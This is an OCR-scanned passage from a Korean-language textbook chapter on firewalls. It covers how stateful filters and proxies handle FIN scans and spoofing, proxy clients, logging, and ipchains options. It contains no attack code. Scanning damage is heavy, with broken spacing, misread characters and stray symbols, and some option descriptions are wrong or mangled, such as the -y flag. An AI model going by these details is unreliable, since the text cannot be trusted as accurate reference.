게 되 있지 않으므로 정 적파케 트려 과기 는 이 자료가 설정 된 대 화의 부분이 라고 가정 하고 그 
것을 동과하도록 한다. 

동적파케트려과기는 같은 검사를 하고있지만 그는 련결이 처음으로 설정되였을 때에 
는 하나의 상태표항목을 만든다. 원격봉사기 가 보호된 호스트에 응답하려 할 때 마다 상태 
표를 참조하여 다음의 내용을 담보하게 된다. 


첫째로; 보호된 호스트가 하나의 자료요청을 실제로 만들었다. 
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둘째로; 원천포구정보는 자료요청과 맞는다. 

셋째로; 목적지포구정보는 자료요청과 맞는다. 

또한 동적파케트려과기는 순서번호와 답례번호도 다 맞는가를 확인할수 있다. 이 모 
든 자료가 정 확하다면 동적 파케 트려 과기 는 그 파케 트를 통과하도록 한다. 매 체 계 에서 FIN 
파케 트가 전송되 면 그 상태표항목은 제 거 된다. 또한 만일 일정한 시 간동안(구성 에 따라서 
1분 혹은 지 어 한 시 간동안) 응답이 접수되지 않으면 방화벽 은 그 원격봉사기 가 더는 응 
답하지 않고있다고 판단하고 그 상태 표항목을 다시 지 운다. 이 것은 현재 의 상태표를 그대 
로 유지 한다. 

이제 공격 자가 이 자료흐름을 눈치채 고 그 보호된 호스트를 공격 하기로 결심 하였다고 
하자. 그가 하려고 하는 첫번째 일은 보호된 체계를 포구주사하여 그것이 어떤 듣는 봉사 
를 가지고있는가를 알아내는것이다. 그림 3-9 에서 볼수 있는바와 같이 이것은 두 방화벽 
장치들이 다 막을수 있다. 그것은 초기주사하는 파케트들은 SYN 비트가 1로 설정되여 있 
고 다른 모든 비트는 0이기때문이 다. 

실망하지 않고 공격 자는 ACK 와 FIN 비트가 1인 파케트를 전송함으로써 FIN 주사를 하 
려고 시도한다. 이제 그 결과는 좀 다르다. 파케트려과기는 그저 SYN 비트가 1인것을 찾 
고있으므로 이 조건 이 성 립안되 는것 을 보고는 이 자료흐름을 쉽 게 통과시키 게 된 다. 

그러 나 동적파케 트려 과기 는 좀 더 까다롭다. 그는 SYN 비 트가 설정 되 여있지 않다는 
것 을 알고는 이 자료흐름을 상태표와 비 교하기 시 작한다. 이 점 에서 그는 보호된 호스트 
가 공격 자와 결코 통신대 화를 설정하지 않았다는것 을 알게 된다. 우리 의 호스트가 먼저 련 
결 을 시 도하지 않았다면 공격 자가 하나의 대 화를 끝내 려 고 할 아무러 한 리유도 없 다. 그 
러므로 이 자료흐름은 통과하지 못한다. 이것을 그림 3-10 에서 보여주었다. 
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그림 3-10. FIN 주사를 진행한 결과 


그러면 만일 공격 자가 원격봉사인것 처 럼 가장하여 방화벽을 속이 려 한다면 어떻게 되 
겠는가? 그가 이 공격 을 성 과적 으로 수행 하자면 많은 조건들이 갖추어져 야 한다. 

첫째 로 ; 공격 자는 원격봉사기 의 IP 주소를 속이거 나 가정 하여 야 한다. 

둘째 로 ; 주소가 가정되 였 다면 공격 자는 더 측정 을 하여 원격봉사기 가 스스로 요청 들 
에 응답할수 없다는것을 확인하여 야 한다. 

셋째로; 주소를 속였다면 공격자는 회선에 불지 않고 응답들을 읽는 어떤 방법을 가 
지 고있어 야 한다. 

넷째로; 공격자는 리용하고있는 원천 및 목적지봉사포구들을 알아냄으로써 자기의 자 
료흐름이 상태표의 그 항목들과 맞도륵 하여 야 한다. 

다섯째 로; 실현방법 에 따라 답례 및 순서번호들도 맞아야 한다. 

여 섯째 로 ; 공격 자는 방화벽 과 보호된 호스트에 서 의 시 간초과를 피 하기 위 하여 중분히 
빨리 통신대화를 처 리하여 야 한다. 

이러한 공격을 가하는것은 가능하지만 성공하기는 쉽지 않다. 명백히 공격자는 지식 
이 매우 많아야 한다. 
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UDP 자료흐■과 동적파케트려과 

앞에서 본것처럼 정적파케트려과는 UDP 자료흐름의 취급과 관련하여 몇가지 실제적 
인 문제들을 가지고있다. 그것은 UDP 머리부가 련결상태에 대해서는 정보를 가지고있지 않 
기때 문이 다. 그러 므로 동적 파케트려과가 매 우 유용한것 으로 되 고있는데 여 기서는 방화벽 그 
자체 가 상태 정 보를 기 억할수 있는것 이 다. 그것 은 파케 트머 리 부안에 있는 정 보에 의 거하는 
것 이 아니 라 모든 대화들의 상태와 관련하여 자기의 표를 가지고있다. 

UDP 자료흐름을 동과시 키려고 할 때에는정적려 과가 아니 라 동적 려 과를 사용하여 야 한 
다. 상태표정보를 추가한 이 방화벽 설정 방법 은 봉사에 서 보안을 훨씬 더 강화하였 다. 

동적 파케트려과의 실현은 전송층규약에 따라 다르다. 그것은 TCP , UDP , 그리 고 ICMP 
와 같은 매 전송층규약에 대하여 특징적으로 실현되 여 야 한다는것을 의미한다. 동적파케 
트러 과기 를 선택 할 때 그 방화벽 이 자기 가 리 용하려 고 하는 모든 전송층규약들에 대 하여 상 
태 를 유지할수 있는가를 확인해 보아야 한다. 

동적파케 트려과기 는 파케 트속성 과 상래 표에 기 초하여 자료조름조종을 결정 하는 지 능 
적인 장치이다. 상태표가 있으므로 하여 방화벽장치는 이전의 통신파케트교환을〈〈기억》 
하고 이 보충적 인 정보에 기초하여 판단을 하게 되는것 이다. 

동적파케 트려 과기 의 가장 큰 제 한성 은 그것 이 파케 트안에 포함된 실제자료인 유효내 
용 ( payload ) 에 기 초한 려 과결정 을 할수 없는것 이 다. 유효내 용에 따라 려 과하기 위하여 서 
는 대 리 자에 기 초한 방화벽 을 리용하여 야 한다. 

③ 상래 려 과 

상태 려 과는 동적 파케 트려 과의 능력 을 개 선한다. 처 음에 는《 여 러 준위 상태 검 사》라는 이 
틈으로 실 현되 였 는데 상태규칙 들은 규약에 따라 다르며 대 화 (상태 가 아니 라) 의 문맥 을 계 
속 기억하고있다. 이것은 려과규칙들로 하여금 비련결성특성으로 하여 이전에 정적려과에 
서는 관리에서 면제되고 동적려과에서는 유일하게 식별되지 못하였던 여러가지 비련결형 
규약들 ( UDP , NFS 그리고 RPC 》} 같은것들)을 구별할수 있게 한다. 

상태 려 과가 동적 려과에 보중제 공되 는것 은 련결상태 가 아니 라 응용프로그람상태 를 유 
지 하는 능력 이 다. 응용프로그람상태 는 이 전에 인증된 사용자가 재 위 임 하지 않고 새 로운 련 
결을 만들수 있게 허용한다. 또한 련결상태는 하나의 대화기간 그 권한을 유지한다. 

이것의 한가지 실례는 사용자인증에 기초한 내부접근을 허용하는 방화벽 이 다. 만일 한 
인증된 사용자가 다른 하나의 열람기를 열려고 한다면 동적려과경로기는 그 사용자에게 그 
의 통과암호를 요구할것 이 다. 그러 나 상태 려 과는 이 미 존재하는 (그리 고 동시 에 발생하는) 
련결은 그 같은 기계에 대하여 유지되고있다고 인식하고 자동적으로 추가적인 대화를 허 
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④ 대리자 ( Proxy ) 

대 리 자봉사기 (때 로 응용프로그람관문국 또는 송달자라고도 한다. )는 두 망토막사이 에 
서 자료흐름을 중개하는 응용프로그람이다. 대 리 자는 흔히 려과기대 신으로 리용되 여 자료 
흐름이 두 망사이 에서 직 접 통과되 지 않도륵 한다. 대 리 자가 중개 자로 동작하면 원천 및 목 
적지체계들은 사실상 서로 련결되여있지 않게 된다. 대리자는 모든 련결시도에서 중개자 
로서 의 역 할을 수행한다. 

대리자가 어떻게 자료흐름을 통과시키는가? 

파케 트려 과기 와 달리 대 리 자는 자료흐름의 경 로를 지 정하지 않는다. 

사실상 적당히 구성된 대리자는 모두 경로조종기능을 가지고있지 않다. 대리자는 방 
화벽의 매 측의 매 체계를 맡아보거나 또는 대변한다. 

한가지 비 유로서 언어번역 기 를 통하여 말하고있는 두 사람을 생 각해보자. 이 두 사람 
이 회화를 하고있는것은 사실이지만 그들은 사실상 서로에게 말하고있는것이 아니다. 모 
든 통신은 다른쪽으로 통과되 기전에 번역 기를 거 치게 된다. 번역 기는 리 용된 언어의 일부 
를 없애거나 또는 나쁘다고 느껴지는 말들은 려과해버릴수 있다. 

이것 이 어떻게 망통신과 관련되겠는가를 알기 위하여 그림 3-11 을 보기 로 하자. 내 
부호스트는 원격봉사기로부터 하나의 웨브페지를 요청하려고 한다. 그는 그 요청을 형식화 
하고 그 정보를 원격 망을 이끄는 관문에 로 전송한다. 이 경우에 관문국은 대 리 자봉사기 이 다. 

대리자가 그 요청을 받으면 그는 내부호스트가 어떤 형태의 봉사에 접근하려 하는가 
를 식 별 한다. 이 경 우에 호스트는 웨 브페 지 를 요청하였 으므로 대 리 자는 그 요청 을 HTTP 
대 화를 처 리 하는데 리 용되 는 응용프로그람에 로 보낸 다. 이 응용프로그람은 HTTP 통신을 취 
급하는 하나의 기능을 가지 고 기 억기 에서 돌아가는 하나의 프로그람이다. 

HTTP 응용프로그람이 이 요청을 받으면 그는 ACL 이 이러한 형식의 자료흐름을 허용 
하는가를 확인한다. 자료흐름이 허 용된 다면 대 리 자는 원격봉사기 에 보낼 하나의 새 로운 요 
청을 형식화한다. 이때 그는 원천체계로서 자기자신만을 리용한다. 다른 말로 하면 대 리 
자는 그 요청 을 간단히 통과시키 지 않고 원격 정 보를 위한 하나의 새 로운 요청 을 만드는것 
이 다. 이 새 로운 요청 은 다음에 원격봉사기 에 전송된 다. 요청 이 망분석 기 에 의하여 검 사 
되 면 그는 내부 호스트가 아니 라 대 리 자가 그 HTTP 요청 을 만드는것 으로 본다. 그러므로 원 
격봉사기 는 대 리 자봉사기 에 로 응답하게 된 다. 
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그림 3-11. 틍신대화를 중개하는 대리자 


대 리자봉사기는 응답을 받으면 그 응답을 또 HTTP 응용프로그람에 보낸다. 그러면 
HTTP 응용프로그람은 원격봉사기 가 보낸 자료에서 비 정상적 인것 이 없는가를 세밀히 검 토 
한다. 만일 자료가 접수가능하다면 HTTP 응용프로그람은 하나의 새로운 파케트를 만들어 
그 정보를 내부호스트에 전송한다. 

알수 있는것 처 럼 두 끝체 계 는 사실상 직 접 적 으로 정 보를 교환하지 않는다. 대 리 자는 부 
단히 대화에 끼여들어 그것이 다 안전하다는것을 확인한다. 

대 리 자는 리용되 고있는 응용규약을〈〈 리 해》하여 야 하므로 그들은 규약과 관련 한 보 
안을 실 현 할수도 있 다. 실 례 로 내 부 FTP 대 리 자는 외 부체 계 에 의 하여 수신되 는 Put 와 mput 
요청들을 모두 려과해내도록 구성될수 있다. 이것은 읽기전용 FTP 봉사기를 만드는데 리 
용될수 있다. 방화벽밖의 사람들은 FTP 봉사기에 파일쓰기를 요구하는 명령을 보낼수 없다. 
그러 나 그들은 FTP 봉사기 로부터 파일을 수신하게 하는 파일얻 기명 령을 수행할수 있다. 

대 리 자봉사기는 응용프로그람에 따라 다르다. 대 리 자를 동하여 새로운 규약을 지원하 
도륵 하기 위 하여 서 는 그 규약을 위한 대 리 자가 개 발되 여 야 한다. 만일 대 리 자방화벽 을 선 
택 한다면 그것 이 자기 가 리용하려 고 하는 모든 응용프로그람들을 지 원하는가를 확인하여 
야 한다. 

꽂개 식 관문 (plug gateway ) °1 라고 부르는 간단한 대 리 자도 있 다. 그것 들은 지 원하는 응 
용프로그람을 리해하지 않으므로 진짜 대 리 자라고는 말할수 없 다. 꽂개식관문은 그저 특 
정 의 봉사포구를 위 한 련결 성 을 제 공하며 동적 려 과보다 더 큰 리 득을 주는것 은 없 다. 


대리자환경에서 의릐 기구성 

어떤 대 리자봉사기들은 모든 내부호스트들이 SOCKS 나 변경된 winsock . dll 파일과 같 
은 련결쏘프트웨 어 를 돌릴것 을 요구한다. 이 매 프로그람은 하나의 기 능을 봉사한다. 즉 모 
든 비 국부적 자료흐름을 대 리 자에게 로 전송한다. 환경 에 따라 이것은 매 우 리 롭거 나 또는 아 
될수도 있다. 
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대리자의릐기의 우점 

대 리 자의 뢰 기 쏘프트웨어 는 많은 우점 을 가지 고있는데 무엇 보다도 구성 이 쉬 운것 이 다. 
의뢰기는 모든 비국부자료요청들을 대리자에게 보내도록 설계되므로 유일하게 요구되는 구 
성 정 보는 유효한 IP 주소들과 부분망마스크이다. 경 로기 와 DNS 파라메 터 들은 무시 될수 있 
다. 그것은 이 정보가 대리자우에서 구성될 때에만 필요하기때문이다. 

사실상 많은 대리자들은 통신규약으로 IP 를 리용할것조차 요구하지 않는다. 실례로 
Microsoft 대 리 자봉사기 2. 0은 하나의 교체 winsock . dll 파일 을 가지 고있는데 그것 은 IPX 가 국 
부작업 기 에 리용되 도록 허 용한다. 일 단 자료흐름이 대 리 자에 도달하면 그것 은 IP 로 변환 
되 여 원격봉사기 에 전송된다. IPX 가 지배 적 인 환경 에서 이것 은 망에 추가적 인 규약을 돌 
릴것을 피할수 있는 매우 간단한 방도로 될수 있다. 

대 리 자의뢰기는 또한 가입 이 름과 통과단어 에 기 초한 외부련결시도를 허 가하기 위하여 
투명한 인증을 제 공한다. 실례 로 노벨의 BorderManager 는 NetWare 등록부봉사 ( NDS ) 와 
결 합되 여 사용자가 인 터네 트에 접 근할 때 그를 투명하게 인증한다. 사용자가 NDS 에 인 
증되 는한 그 사용자는 인 터 네 트자원에 접 근할 때 동과암호를 넣 지 않아도 된 다. 

바깥방향대 화의 사용자인증은 증가된 가입 등록과 관리 를 위 하여 리 용된 다. 인증이 리 
용되 지 않는다면 방화벽 은 원천 IP 주소에 의 거하여 누가 어 느 인 터네 트자원에 접 근하였는 
가를 식별하여야 한다. 이것은 하나의 문제로 될수 있다. 자기의 신원을 변경시키려면 사 
용자는 자기 의 IP 주소를 변경시 켜 야 한다. 이 것은 DHCP 또는 Bootp 환경 에서 자기 의 모 
든 사용자들을 추적 하려 한다면 심 중한 문제 로 될수 있 다. 

대리자의릐기의 부족점 

대 리 자의뢰기는 리용하는데서 많은 부족점도 가지 고있다. 무엇보다도 전개 이 다. 만일 
대리자봉사기를 리용하려고 하는 1 000개의 기계를 가지고있다면 이 매 기계들에 보충적 
인 쏘프트웨어를 적재하여야 한다. 그런데 쏘프트웨어호환성도 문제로 된다. 어떤 응용프 
로그람들은 교체 winsock . dll 과 호환되 지 않는다. 실례 로 현재 Winsock 2. x 를 요구하는 응 
용프로그람들이 있음에 도 불구하고 많은 Winsock 교체프로그람들은 아직 1. x 판본으로 작 
성 되고있 다. 

그러 면 많은 탁상형콤퓨터들을 Windows 체 계 로 실행시키지 않는다면 어 떻게 될것 인 
가? 많은 대 리 자들은 Windows 가 아닌 조작체 계 에 대 한 의뢰기 쏘프트웨어를 제 공하지 않 
는다. 이 경 우에 는 자기 가 리용하려 고 하는 모든 IP 응용프로그람들이 SOCKS 호환인가를 
확인하여 야 한다. 의뢰기쏘프트웨어도 이동사용자 또는 휴대 용를퓨터사용자들에 게 있어서 
문제로 된다. 실례로 한 휴대용를퓨터사용자가 낮에는 국부망에 련결하고 밤에는 자기의 인 
터 네 트봉사제 공자 ( ISP ) 에 전화접 속한다고 하자. 이 경 우에 그는 자기 의 대 리 자의 퇴 기 를 낮 
에는 쓸수 있지만 밤에는 쓸수 없다는것을 알아야 한다. 

마지 막으로 대 리 자의뢰기는 당신이 여 러개의 망토막들을 가지 고있다면 실제 적일 문제 
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로 될수 있다. 이것은 대 리자의뢰기가 모든 비국부자료흐름을 대 리자봉사기에 전송할것을 
기대하고 있기때문이다. 이것은 만일 많은 부분망들을 가지는 큰 망환경을 가지고있다면 좋 
은 해 결책 이 못된다. 어 떤 구성 에서 는 일정 한 부분망들을 대 리 자에 게 자료전송하는데서 제 
외시키고 있으나 이것은 국부작업기에 보관된 본문파일을 변경시킬수 있다. 

투명한 대리자 

모든 대리자들이 특수한 의뢰기쏘프트웨어를 요구하는것은 아니다. 일부는 투명한 대 
리자로서 동작할수 있는데 그것은 모든 내부호스트들이 대리자가 마치도 인터네트에 련결 
되는 보통의 경로기인것처럼 구성된다는것을 의미한다. 

만일 대리자방화벽이 자기의 보안요구에 가장 잘 맞는다고 결심한다면 또한 투명대 
리 자를 리 용할것 인지 아니 면 비 투명 대 리 자를 리 용할것 인지 를 결정 하여 야 한다. 


Java, ActiveX 및 HTML Script 들의 려과 

대 리 자들은 자료파케 트의 유효내 용을 분석 하고 이 파케 트를 통과시 킬것 인가 거 부할것 
인가를 결정할수 있다. 이것은 관리 자로 하여금 어떤 형식의 자료가 망에 허용되 여 야 하 
는가를 세심히 분석 할수 있는 강한 능력을 가질수 있게 하는 좋은 특징 이 다. 내용려과를 고 
찰할 때 대부분의 사람들이 먼저 생각하는것은 Java 와 ActiveX 이다. 

Java 는 이식성있는 프로그람언어이다. 이식성 이란 그것이 임의의 망조작체계상에서 가 
동할수 있도륵 설계되였다는것을 의미 한다. 대표적으로 Java 지원은 Java 지향웨브열람기 
의 리용을 통하여 실 현된 다. Java 프로그람을 애 플리 트 (applet) 라고 부론다. 

ActiveX 는 Microsoft 의 객체 련결 및 매몰 (OLE) 또는 요소객체모형 (COM) 의 전문화 
된 실현 이 다. ActiveX 에 의 하여 ActiveX Contr 이이 라고 부르는 이 식성 이 좋은 프로그람 
을 만들수 있다. 

ActiveX Contr 이의 우점은 그것이 여러 응용프로그람들에 공유될수 있다는것이다. 
ActiveX 는 프로그람언어는 아니 다. ActiveX Control 은 C++, PowerBuilder, Visual Basic 
또는 Microsoft Java 와 같은 다른 프로그람언어 들을 리용하여 만든다. 

Java Applet 와 ActiveX Contr 이은 봉사기 로부터 가져 와서 어 떤 호환가능한 웨 브열 람 
기에서 가동할수 있다. 이 프로그람들의 기능은 아이론으로부터 공유된 응용프로그람까지 
많은것을 포함한다. 만들어질수 있는 프로그람의 형식에는 얼마간 제한이 있다. 

Java 와 ActiveX 는 둘다 보안을 고려하여 개 발되 였지 만 (Java 는 ActiveX 보다 더 강력 
하다.) 몇가지 보안상 약점 이 발견되였다. 

Java 와 ActiveX 를 리 용하는것 이 그리 좋지 않다고 생 각한다면 문제 는 그에 대 처 하여 
무엇을 할수 있는가 하는것이다. 많은 대리자방화벽들은 Java 와 ActiveX 프로그람코드들 
의 전부 또는 일부를 려과해 낼수 있는 능력을 제공한다. 그러므로 망사용자들은 나쁜 응 
용프로그람을 실행 시 킨다는 생 각은 하지 않고 계 속 원격웨 브싸이트들에 접 근할수 있 다. 

IL Weeding 검사상자는 관리자로 하여금 JavaScript, Java Applet 또는 지 어 
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ActiveX Control 에 대 한 모든 꼬리 표참조를 려과하게 한다. 

Block Java Code 검 사상자는 방화벽 이 모든 Java 프로그람코드를 려 과하게 한다. 이 선 
택들의 결합은 어떤 형 태의 자료들을 내부웨 브열 람기 에 도달하게 할것 인가를 결정하는데 
서 어떤 유연성을 제공한다. 

동적파케트려과와 대리자의 우점과 약점 

이 매 개 방화벽 들은 자기 의 우점 과 약점 을 가전 다. 동적 려과는 대 리 자보다 일 하기 더 
쉽고 대부분의 기업요구에 더 잘 맞는 능력을 가지고있지만 대리자봉사기와 같이 그렇게 세 
밀하게 골라 내는데서는 유능하지 못하다. 동적과케트려과와 대 리자는 둘다 나쁘다고 알 
려 진 자료흐름을 차단하지 만 애매한 자료에 대 하여서는 매개 가 약간 다르게 동작한다. 

실례 로 두개의 방화벽 즉 동적파케트려과기 와 대 리 자를 가지 고있다고 하자. 그 매 개 
는 일정 한 응용프로그람에 대 하여 높은 우선권기 발설정 을 가지는 하나의 자료파케트를 수 
신하는데 이리한 형식의 자료를 어떻게 처리할것인가에 대하여서는 서로 다르게 프로그람 
화되 였 다. 대 표적 으로 동적파케 트려과기 는 문제 의 자료흐름을 통과시키 며 대 리 자는 그것 을 
통과시 키 지 않는다. 또한 대 리 자는 응용프로그람지향이 므로 실제자료의 내 용을 더 검 열 하 
지만 동적려과기는 그렇게 할수 없다. 이것은 경계선보호의 두가지형태에 대한 리론적비교 
이 다. 실제 적 인 과정 은 선택하는 구체 적 인 제 품에 따라 변할수 있 다. 

대 리 자는 좀 더 안전하지 만 그것들은 특정한 기 업의 요구에 맞추는것 이 보다 어 렵 다. 
실례로 많은 대리자들은 Microsoft 의 NetMeeting 이나 Real Audio 와 Video 와 같은 현대 
적 인 봉사들을 지원하는데서는 좀 불편하다. 가장 안전한 경계선보안장치는 한쌍의 도선 
절단기 이 다. 적 당한 방화벽선택은 가장 높은 보안수준을 가능하게 하면서 련결성 에 대한 요 
구를 모두 만족시키 는것 이 다. 보충적 으로 말하면 좋은 방화벽 제 품은 가장 높은 보안수준 
과 유연성 을 제 공하기 위하여 동적파케 트려과와 대 리 자기 술을 결 합한것 이 다. 

一 접근감시 및 기록기능 

접 근감시 및 기 록기능은 방화벽 의 중요한 기 능의 하나이 다. 

이 기 능은 방화벽 을 경 유하는 모든 파케 트흐름을 등록하고 분석하는 기 능이 다. 

등록은 누가 망경 계 를 통과하였 고 또 누가 통과하려 고 시 도하다가 실패하였는가를 문 
서로 만드는것으로써 매우 중요하다. 

등록파일은 최소한 다음과 같은 요구조건을 만족하여 야 한다. 

^ 등록파일은 모든 항목들을 명백하고 읽기 쉬운 형식으로 구성되여야 한다. 

^ 등록자료를 분석도구에로 보내는것 이 보다 효과적 일수도 있지만 하나의 표의 모든 
항목들을 보고 자료흐름패런을 더 잘 식별할수 있어 야 한다. 

@등록파일은 어느 자료흐름이 차단되였고 어느 자료흐름이 통과되였는가를 명백히 식 
별하여 야 한다. 

^ 분석도구프로그람으로 할수도 있겠지만 려과와 정렬을 리용하여 등록파 

錢變邊 鍾變變繼繼繼 






Lirnix 당보안 


하여 특정형식의 자료흐름에 집중할수 있어야 한다. 

^ 등록파일은 정해진 크기제한에 따라 항목들을 겹쳐쓰거나 빠뜨리지 말아야 한다. 
^ 등록파일을 원격위치로부터 안전하게 볼수 있어 야 한다. 

1 모 등록파일은 리 용하는 목적 에 따라 여 러 가지 종류로 구성 되 여 야 한다. 

실례로 방화벽규칙의 경유결과에 따르는 기록인가，망의 부하정도를 보기 한 기록인 
가，공격검출결과에 따르는 기록인가 등에 따라서 여 러 가지 종류로 출력되여 야 한다. 
^ 등록프로그람은 어떤 방법으로 이 등록파일을 ASCII 와 같은 적어도 한가지 공통 
적인 형식으로 줄구할수 있어야 한다. 이렇게 하면 그 자료를 다시 기록도구，표 
계 산프로그람 또는 자료기 지프로그람으로 처 리할수 있 다. 

공격자가 첫 시도에서 접근을 얻는것은 매우 드물다. 만일 규칙적으로 등록파일을 세 
밀히 분석한다면 공격 이 발생 하기 전에 그것을 좌절시 킬수도 있다. 좋은 등록도구가 매우 
중요하다. 

방화벽제 품을 선택 할 때 등록파일대 면부가 유연하여 야 한다는것 을 명 심 하여 야 한다. 
방화벽의 ACL 은 보통은 설정되여있고 매우 적은 변화를 요구하므로 등록파일을 보고 자 
료흐름을 분석하기 쉬워야 한다. 


3.2.2. LINUX 에서 방화벽의 실현구조 

LINUX 체계에는 파케트러과형식의 방화벽제품들이 내장되여 있는데 이것은 핵심부판 
본에 따라서 다르다. 

핵심부판본 2.1.102 이하에서는 ipfwadm 이 라는 방화벽도구가 리용되고있으며 판본 
2.1.102 부터 2. 4까지 는 ipchains 라는 방화벽 도구가 리용되 고있 다. 

또한 판본 2. 4이 상부터 는 iptables 라는 방화벽 도구가 리용되 고있 다. 

여기서는 ipchains 와 iptables 에 대해서 구체적으로 고찰한다. 

1) ipchains 

一 파케트 려과기능을 위한 조건 

ipchains 를 리 용하여 파케 트러 과기 능을 수행 하기 위 해서 는 핵 심부안에 IP 방화벽 
사슬 (Generic IP Firewall Chain ) 기능을 갖추고 있어야 한다. 현재 사용하고있는 핵 
심부가 파케 트려 과기 능을 포함하는지 확인하기 위 해서 는 / proc / net / ip/fwchains 파일 이 있 
는지 확인하여 야 한다. 만약 파일 이 존재하지 않는다면 IP 방화벽 사슬 기 능을 가지 도록 핵 
심부를 재를파일해 야 한다. 

파케 트려과를 위해 추가해 야할 설 정옵션은 아래 와 같다. 


CONFIG_EXPERIMENTAL 

CONFIG.FIREWALL 


CONFIG _ IP _ FIREWALL 

FIG _ IP _ FIREWALL_CHAINS 
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一 일반 IP 방화벽 사슬 (Generic IP firewalling Chains) 

핵심부는 3 가지의 방화벽사슬을 기본적으로 가지고 파케트려과를 시작한다. 3 가지 방 
화벽 사슬은 입 력 (Input) ， 출력 (Output) ， 전 달 (Forward) 이 다. 입 력 (Input) 사슬은 들어 오 
는 파케트를 조사하고 전달 (Forward) 사슬은 외부의 다른 체계로 전달될 파케트를 조사한 
다. 마지막으로 출력 (Output) 사슬은 외부로 나가는 파케트을 조사한다. 실지 파케트를 사 
슬을 통하여 검 사하는 일은 핵 심부가 맡게 된다. 여 기서 사슬은 규칙을 적용할 항목이 고 규 
칙 은 파케 트을 처 리 하기 위한 기 준이 다. 

— ipchains 규칙 

표 3_9 는 ipchains 의 사슬을 관리 하기 위한 명 령 들이다. 보통 대 부분의 사슬을 파케 
트려 과를 위한 규칙 목록으로 해 석한다. 


표 3-9. 

파케트려과 규칙명령 

명령 

설명 

-N 

새로운 사슬을 만든다. 

-X 

사슬을 지운다. 

-P 

내 장사슬에 대 한 기 본방책 을 변경한다. 

-L 

모든 규칙 을 현시한다. 

-F 

사슬로부터 규칙을 모두 지워버린다. 

-Z 

사슬의 모든 규칙 에 대 한 파케 트계 수값을 0 으로 설 정한다 

표 3-10 은 사슬의 규칙을 관리하는 명 령을 나타낸다. 

표 3-10. 

사슬규칙관리명령 

명령 

설명 

-A 

사슬에 새로운 규칙을 추가한다. 

-I 

사슬에 새 로운 규칙 을삽입 한다. 

-R 

사슬에서 특정 위 치의 규칙 을 교체한다. 

-Dnum 

사슬의 특정규칙 (num) 을 삭제한다. 

-D 

사슬에 서 첫 번째 로 정 합되 는 규칙 을 삭제 한다. 

-M-L 

현재 가장 (masquerade) 된 접 속규칙 을 라렬한다. 

-M-S 

가장 (masquerade) 시 간초과값을 설정 한다. 


ipchains 는 파케 트의 특성 을 지 정 하기 위하여 여 러 가지 옵션들을 사용한다. 표 3-11 
은 파케 트의 특성 을 표현하는 옵션들이다. 


% 
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표 3-11. 

파케트의 특성옵션 

옵션 

설명 

_s 

파케트의 발신지를 명시한다. 

-d 

파케트의 도착지를 명시한다. 

~P 

파케트의 통신규약을 명시 한다. 

-I 

규칙을 적용할 대면부이름을 명시 한다. 

y 

접속요청파케트인 SYN 파케트을 허용하지 않는다. 

-f 

두번째 이 후의 조각에 대 해 서 규칙 을 명 시 한다. 


① _ s 와 d 옵션 

이 옵션들은 파케 트의 원천지 와 목적 지 주소를 지 정 하기 위하여 리용한다. 

이 옵션을 사용하여 원천지 와 목적 지 IP 주소를 지 정하는 방법 에 는 네 가지가 있 다. 
www . Linuxzone . com 과 같이 완전한 이름을 사용하는 방법과 192.168.1.2 와 같은 IP 주 
소를 사용하는 방법 그리 고 192.168.1.0/255. 255. 255.0 또는 192.168.1. 0/24와 같이 IP 
주소의 그롭으로 표현하는 방법 이 있다. 

192.168.1. 0/24와 192.168.1.0/255. 255. 255. 0은 모두 해 당 망의 모든 IP 주소를 나 
타낸다. 즉 192.168.1.0 에서 192.168.1.255 까지를 나타낸다. / 다음에 붙는 수자는 해 
당 망주소에 서 중요한 부분의 bit 수이 다. 기 본값은 255. 255. 255. 255. 를 나타내 는 32이 
다. 0을 사용하면 모든 IP 주소를 나타낸다. 

와 _ d 옵션뒤 에 !를 추가할수 있는데 이것 은 역 규칙 ( inversion ) 을 설정 하기 위 해서 이 
다. - s ! www . Linuxzone . com 과 같이 설 정 하였다면 이 것 은 www . Linuxzone . com 에 서 오 
지 않는 다른 모든 파케 트를 의 미한다. 

② _ p 옵션 

- p 옵션을 사용하여 TCP 나 UDP 포구를 명시할 경우에는 포구를 지정할수 있을뿐 아 
니라 포구의 범위를 지정할수 있다. 실례로 1024:1030 과 같이 지정하면 이것은 1024 
포구에서 1030포구까지 총 7개의 포구를 의 미한다. 만약 1024값이 생 략된다면 이는 0 
번이 시작포구번호가 되고 1030이 생략된다면 65535번이 마지막 포구번호가 된다. 

또한 포구는 www 와 같은 이 름으로도 지 정할수 있 다. 

-p TCP -d ! 192.168.1.1 80 
-P TCP -d 192.168.1.1 ! www 


우의 례에서 첫번째 설정은 IP 주소가 192.168.1.1 이 아닌 모든 체 계의 80포구를 사 
용하는 TCP 파케 트를 의 미한다. 두번째 설정 은 IP 주소가 192.168.1.1 인 체계의 80번 
포구를 제외한 모든 TCP 파케트을 나타낸다. . 

:칙 ( inversion ) 설정은 통신규약을 지정하기 위한 옵션인 p 옵션에도 붙일수 있다. - 


參 
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p 옵션을 사용하여 ICMP 를 지정할 경우 ICMP 는 부가적 인 옵션을 가질수 있다. 그러 나 ICMP 
의 경우에는 포구가 없기때문에 그 의미는 다르다. 

표 3-12 는 ICMP 파케트들중 가장 일반적 인것들이 다. 


표 3-12. 

ICMPII 

f 케트 

해 당번 호 

이 름 

용 도 

0 

Echo-reply 

Ping 

3 

Destination-unreachable 

TCP/UDP 자료 교환 

5 

Redirect 

경로데몬을 사용하지 않을 때의 경로선택 

8 

Echo-request 

Ping 

11 

Time-exceeded 

Traceroute 


ICMP 이름앞에는 역 규칙 ( inversion ) 을 붙일수 없다. 

③ _ i 옵션 

-i 옵션은 input 사슬을 통과하는 파케 트에 대 한 대면부와 output 사슬에 대 한 대면부，마 
지막으로 forward 사슬에 대 한 대면부를 지정할수 있다. 특히 대면부를 지정할 경우 반드 
시 해당 대면부가 동작하고있을 필요는 없다. 해당 대면부가 동작할 때까지는 정의된 규 
칙이 어떠한 경우에도 해당되지 않기때문이다. 

옵션에 역 규칙 ( inversion ) 을 적용할수 있다. 

④ _ f 옵션 

파케트의 크기는 언제나 한번에 전송되기에 적절하지 않다. 때로는 한 회선을 통하여 
파케트가 전달되기 어려운 때가 있다. 이때는 파케트가 여러개의 조각으로 분할되여 전달 
된다. 그러면 파케트를 수신하는 쪽에서는 다시 이 조각난 파케트들을 원래 파케트로 재 
조립을 하게 된다. 

그러나 여기에 문제점이 하나 있 다. 앞에서 언급한 파케트려 과에서 고찰대상인 원천 
지 나 목적지포구 그리 고 ICMP 류형과 코드 등은 모두 파케트의 시 작부분 즉 파케 트의 첫 
